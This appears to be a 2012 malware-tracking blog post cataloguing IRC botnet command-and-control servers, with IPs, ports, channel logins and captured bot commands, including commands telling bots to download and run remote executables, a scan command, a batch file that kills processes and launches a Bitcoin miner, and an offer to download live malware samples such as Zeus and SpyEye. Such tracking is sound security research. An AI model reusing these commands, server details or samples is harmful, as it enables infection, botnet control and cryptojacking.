Month: February 2012

173.163.245.113 (irc botnet hosted in United States Albuquerque Comcast Business Communications Llc)

C&C Server: 173.163.245.113:9090
Server Password:
Username: MEAT
Nickname: {iNF-00-DEU-XP-DELL-3588}
Channel: ##hxxp## (Password: )
Channeltopic: :.http http://67.247.34.106/02.02.exe |.scan svrsvc_KOR 50 10 0 -c
Now talking in ##hxxp##
Topic On: [ ##hxxp## ] [ .http http://67.247.34.106/02.02.exe |.scan svrsvc_KOR 50 10 0 -c ]
Topic 11 By 12: [ pe[ro ]
hosting infos: http://whois.domaintools.com/173.163.245.113

119.59.99.52 (irc botnet hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)

Remote Host Port Number
119.59.99.52 2345
NICK New[USA|00|P|33843]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-7233 * 0 :COMPUTERNAME
MODE New[USA|00|P|33843] -ix
JOIN #!loco!
PONG 22
MOTD
hosting infos: http://whois.domaintools.com/119.59.99.52

sfx.dload.asia (BitMines-btc.miner.03 hosted in Germany Hetzner Online Ag)

Resolved : [sfx.dload.asia] To [176.9.42.247]
Resolved : [sfx.dload.asia] To [188.40.92.153]
Resolved : [sfx.dload.asia] To [188.40.93.82]
yz.bat:
ping -n 2 127.0.0.1
taskkill /f /im svchoost.exe
taskkill /f /im mamita.exe
taskkill /f /im x11811.exe
taskkill /f /im Winlogon2.exe
x30811.exe -a 60 -g yes -o http://sfx.dload.asia:8332/ -u redem_g -p x1x2x3x4x5 -t 2
file downloaded after login: http://sfx.dload.asia:8332/ -u

188.72.196.163 (irc botnet hosted in Turkey Netdirect)

Remote Host Port Number
188.72.196.163 4244
PASS google_cache2.tmp
NICK new[iRooT-XP-USA]572986
USER 5729 "" "TsGh" :5729
JOIN #!N!# WTF
PRIVMSG #!N!# :http://tips2x1.bloger.hr Has Been Visited!
Now talking in #!N!#
Topic On: [ #!N!# ] [ .visit http://tips2x1.bloger.hr ]
Topic By: [ NhG ]
hosting infos: http://whois.domaintools.com/188.72.196.163

46.166.140.132 (ngrBot hosted in United States Amsterdam Santrex Internet Services Ltd)

Remote Host Port Number
199.15.234.7 80
46.166.140.132 6667
Clients: I have 112 clients and 0 servers
Local users: Current Local Users: 112 Max: 251
Global users: Current Global Users: 112 Max: 251
PONG :D5E8DE88
JOIN #|Bots|#
PONG :Vater.irc.mit.edu
NICK n{US|XP-32a}jxeicyv
USER jxeicyv 0 * :jxeicyv
Now talking in #|Bots|#
Joins: {HU|W7-64u}txhnliy [txhnliy@rox-7506984E.prtelecom.hu]
Modes On: [

big4eva.no-ip.biz (ngrBot hosted in Russian Federation Mir Telematiki Ltd)

Remote Host Port Number
46.17.98.235 6667
Clients: I have 73 clients and 0 servers
Local users: Current Local Users: 73 Max: 106
Global users: Current Global Users: 73 Max: 106
NICK SB|USA|XP|XHVDhcSI
USER SB|USA|XP|XHVDhcSI big4eva.no-ip.biz SB|USA|XP|XHVDhcSI :SB|USA|XP|XHVDhcSI
JOIN #irc
NICK SB|USA|XP|vxwfnfOz
USER SB|USA|XP|vxwfnfOz big4eva.no-ip.biz SB|USA|XP|vxwfnfOz :SB|USA|XP|vxwfnfOz
Now talking in ##xcn
Modes On: [ ##xcn ]

173.248.187.166 (irc botnet hosted in United States Franklin Mddhosting Llc)

Remote Host Port Number
173.248.187.166 1866
The data identified by the following URLs was then requested from the remote web server:
http://dl.dropbox.com/u/55297842/visitweb.exe
NICK n[USA|XP|COMPUTERNAME]kvrizpu
USER hh "" "lol" :hh
JOIN #!g!
PONG 422
Now talking in #!g!
Topic On: [ #!g! ] [ .load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/ ]
Topic By: [ evoL1x ]
hosting infos: http://whois.domaintools.com/173.248.187.166

120mb malware samples

This package contains a lot of irc bots like ngrBot, Insomnia and banking trojans like Zeus, Spyeye, but the best part of it are the files with the name FuckUPiggw.exe, FuckUPig.exe from one of my fans lol

Download